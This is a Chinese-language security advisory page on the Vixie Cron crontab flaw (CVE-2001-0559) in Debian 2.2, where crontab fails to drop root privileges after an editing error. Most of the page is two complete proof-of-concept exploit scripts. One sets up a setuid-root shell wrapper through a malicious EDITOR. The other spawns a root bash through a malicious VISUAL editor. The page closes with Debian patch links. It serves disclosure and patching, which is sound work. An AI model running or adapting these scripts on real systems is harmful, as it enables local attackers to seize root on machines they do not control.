首页 -> 安全研究
安全研究
安全漏洞
Vixie Cron crontab 特权被利用漏洞
发布日期:2001-05-12
更新日期:2001-05-12
受影响系统:
描述:
Paul Vixie Vixie Cron 3.0pl1
+ Debian Linux 2.2 sparc
+ Debian Linux 2.2 powerpc
+ Debian Linux 2.2 arm
+ Debian Linux 2.2 alpha
+ Debian Linux 2.2 68k
+ Debian Linux 2.2
BUGTRAQ ID: 2687
CVE(CAN) ID: CVE-2001-0559
Vixie cron 是 Paul Vixie 写的一种定时执行后台守护进程,许多自由Unix操作系
统附带了该软件。
通过命令crontab -e可以激活预先指定的编辑器修改定时任务。如果发生错误,
crontab未能正确丢弃root权限,本地攻击者可以利用该漏洞获取root权限。
参看测试程序。
<* 来源:Sebastian Krahmer (krahmer@suse.de) *>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
Cade Cairns <cairnsc@securityfocus.com> 提供了一个验证性质的脚本:
--------------------------------------------------------------------------
#!/bin/sh
#
# cronboom - simple proof-of-concept exploit for vixie cron version 3.1pl1
#
# synopsis:
# the crontab file maintenance program (crontab) fails to drop privileges
# before invoking the editor under certain circumstances.
#
# description:
# a serialization error exists in some versions of the file maintenance
# program, crontab. the vulnerability was introduced in versions which
# were patched for seperate vulnerability in fall of 2000 (see Bugtraq
# ID #1960).
#
# when a parsing error occurs after a modification operation, crontab will
# fail to drop privileges correctly for subsequent modification
operations.
# because the program is installed setuid root, it may be possible for a
# local user to gain root privileges.
#
# affected versions:
# cron_3.0pl1-57.2 distributed with Debian Linux 2.2.
#
# note that copies of the program with the patch mentioned above are
likely
# to also be vulnerable.
#
# references:
# http://www.securityfocus.com/bid/2687
#
# 05/07/01 cairnsc@securityfocus.com
CRONTAB=/usr/bin/crontab
if ! test -x $CRONTAB; then
echo "** unable to locate crontab executable, exiting"
exit 1
fi
cat > vcsh.c << EOF
#include <unistd.h>
int main() {
setuid(0);
setgid(0);
execl("/bin/sh", "sh", NULL);
}
EOF
echo "** compiling shell wrapper as $PWD/vcsh"
cc -o $PWD/vcsh $PWD/vcsh.c
if ! test -x $PWD/vcsh; then
echo "** compilation failed, exiting"
exit 1
fi
echo "** creating simple exploit script as $PWD/vcex.sh"
cat > vcex.sh << EOF
#!/bin/sh
sleep 1 && echo "foo" >> \$1
if test -f $PWD/vcboom; then
chown root.root $PWD/vcsh
chmod 4755 $PWD/vcsh
rm $PWD/vcboom
else
touch $PWD/vcboom
fi
EOF
chmod 0755 $PWD/vcex.sh
echo "** running $CRONTAB -e"
echo "**"
echo "** enter 'yes' at the first prompt, then enter 'no' at the second"
echo
(EDITOR=$PWD/vcex.sh $CRONTAB -e)
echo
echo "** done, the shell wrapper should be suid root"
exit 0
--------------------------------------------------------------------------
Michael Zalewski <lcamtuf@coredump.cx> 和
Sebastian Krahmer <krahmer@security.is> 提供了另外一个exploit code:
--------------------------------------------------------------------------
#!/bin/bash
clear
echo ".-----------------------------------------------------------."
echo "| Marchew.Hyperreal presents: vixie crontab exploit #728371 |"
echo "|===========================================================|"
echo "| Sebastian Krahmer <krahmer@security.is> |"
echo "| Michal Zalewski <lcamtuf@coredump.cx> |"
echo "\`-----------------------------------------------------------'"
echo
test "$CRONBIN" = "" && CRONBIN=/usr/bin/crontab
echo ">>> Using binary: $CRONBIN"
echo -n ">>> Setuid check: "
if [ -u $CRONBIN ]; then
echo "PASSED"
else
echo "FAILED"
echo
exit 1
fi
echo -n ">>> Version check: "
QQ=`strings $CRONBIN | grep '43 vixie Exp'`
if [ "$QQ" = "" ]; then
echo "FAILED"
echo
exit 1
else
echo "PASSED"
fi
echo ">>> Building exploit..."
cat >edit0r.c <<_eof_
#include <stdio.h>
int main(int argc,char* argv[]) {
sleep(1);
if (geteuid()) {
FILE* x=fopen(argv[1],"w");
fprintf(x,"blah blah blah\n");
fclose(x);
} else {
dup2(1,0);
dup2(1,2);
printf("\n>>> Entering rootshell, babe...\n");
system("touch $HOME/.xploited");
system("bash");
}
}
_eof_
gcc edit0r.c -o edit0r &>/dev/null
rm -f edit0r.c
if [ ! -f edit0r ]; then
echo ">>> Cannot compile exploit."
echo
exit 1
fi
rm -f ~/.xploited
echo ">>> Performing attack..."
( echo "y"; echo "n" ) | VISUAL=$PWD/edit0r $CRONBIN -e 2>/dev/null
rm -f edit0r
if [ -f ~/.xploited ]; then
echo
echo ">>> Thank you."
rm -f ~/.xploited
echo
exit 0
else
echo
echo ">>> Apparently I am not able to exploit it, sorry..."
echo
exit 1
fi
--------------------------------------------------------------------------
建议:
Debian 提供了升级版本:
Paul Vixie Vixie Cron 3.0pl1:
Debian upgrade 2.2 alpha cron_3.0pl1-57.3_alpha.deb
http://security.debian.org/dists/stable/updates/main/binary-alpha/cron_3.0pl1-57.3_alpha.deb
Debian upgrade 2.2 arm cron_3.0pl1-57.3_arm.deb
http://security.debian.org/dists/stable/updates/main/binary-arm/cron_3.0pl1-57.3_arm.deb
Debian upgrade 2.2 i386 cron_3.0pl1-57.3_i386.deb
http://security.debian.org/dists/stable/updates/main/binary-i386/cron_3.0pl1-57.3_i386.deb
Debian upgrade 2.2 m68k cron_3.0pl1-57.3_m68k.deb
http://security.debian.org/dists/stable/updates/main/binary-m68k/cron_3.0pl1-57.3_m68k.deb
Debian upgrade 2.2 ppc cron_3.0pl1-57.3_powerpc.deb
http://security.debian.org/dists/stable/updates/main/binary-powerpc/cron_3.0pl1-57.3_powerpc.deb
Debian upgrade 2.2 sparc cron_3.0pl1-57.3_sparc.deb
http://security.debian.org/dists/stable/updates/main/binary-sparc/cron_3.0pl1-57.3_sparc.deb
浏览次数:4118
严重程度:0(网友投票)
绿盟科技给您安全的保障